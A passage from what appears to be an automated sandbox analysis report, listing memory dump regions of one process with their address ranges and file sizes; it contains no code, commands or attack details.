                                                                                                                                                    • memory/5852-1764-0x00007FFF20630000-0x00007FFF20644000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                    • memory/5852-1763-0x00007FFF20650000-0x00007FFF20662000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                    • memory/5852-1762-0x00007FFF20B20000-0x00007FFF20B36000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/5852-1761-0x00007FFF213F0000-0x00007FFF213FC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1760-0x00007FFF20DB0000-0x00007FFF20DC2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                    • memory/5852-1759-0x00007FFF21400000-0x00007FFF2140D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5852-1758-0x00007FFF21410000-0x00007FFF2141B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1757-0x00007FFF21420000-0x00007FFF2142C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1756-0x00007FFF21430000-0x00007FFF2143B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1755-0x00007FFF217D0000-0x00007FFF217DB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1754-0x00007FFF219D0000-0x00007FFF219DC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1753-0x00007FFF21B80000-0x00007FFF21B8E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      56KB

                                                                                                                                                    • memory/5852-1752-0x00007FFF21B90000-0x00007FFF21B9D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5852-1751-0x00007FFF21BA0000-0x00007FFF21BAC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1750-0x00007FFF21BB0000-0x00007FFF21BBB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1749-0x00007FFF21D70000-0x00007FFF21D7C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1748-0x00007FFF21DD0000-0x00007FFF21DDB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1747-0x00007FFF21DE0000-0x00007FFF21DEC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/5852-1746-0x00007FFF29790000-0x00007FFF2979B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1745-0x00007FFF2A510000-0x00007FFF2A51B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1744-0x00007FFF38710000-0x00007FFF3871D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5852-1743-0x00007FFF1BD70000-0x00007FFF1BE8B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.1MB

                                                                                                                                                    • memory/5852-1742-0x00007FFF21440000-0x00007FFF21467000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/5852-1741-0x00007FFF31F70000-0x00007FFF31F7B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5852-1740-0x00007FFF34350000-0x00007FFF3435D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5852-1739-0x00007FFF20530000-0x00007FFF205FD000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      820KB

                                                                                                                                                    • memory/5852-1738-0x00007FFF217E0000-0x00007FFF21813000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      204KB

                                                                                                                                                    • memory/5852-1737-0x00007FFF38780000-0x00007FFF3878D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5852-1736-0x00007FFF22170000-0x00007FFF22189000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/5852-1735-0x00007FFF1AED0000-0x00007FFF1B3F2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.1MB

                                                                                                                                                    • memory/5852-1734-0x00007FFF2FF20000-0x00007FFF2FF35000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      84KB

                                                                                                                                                    • memory/5852-1733-0x00007FFF228B0000-0x00007FFF228DD000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      180KB

                                                                                                                                                    • memory/5852-1732-0x00007FFF34990000-0x00007FFF349A9000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                    • memory/5852-1731-0x00007FFF38AC0000-0x00007FFF38ACF000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      60KB

                                                                                                                                                    • memory/5852-1730-0x00007FFF228E0000-0x00007FFF22905000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      148KB

                                                                                                                                                    • memory/5852-1523-0x00007FFF228B0000-0x00007FFF228DD000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      180KB

                                                                                                                                                    • memory/5852-1504-0x00007FFF1B400000-0x00007FFF1BAD0000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.8MB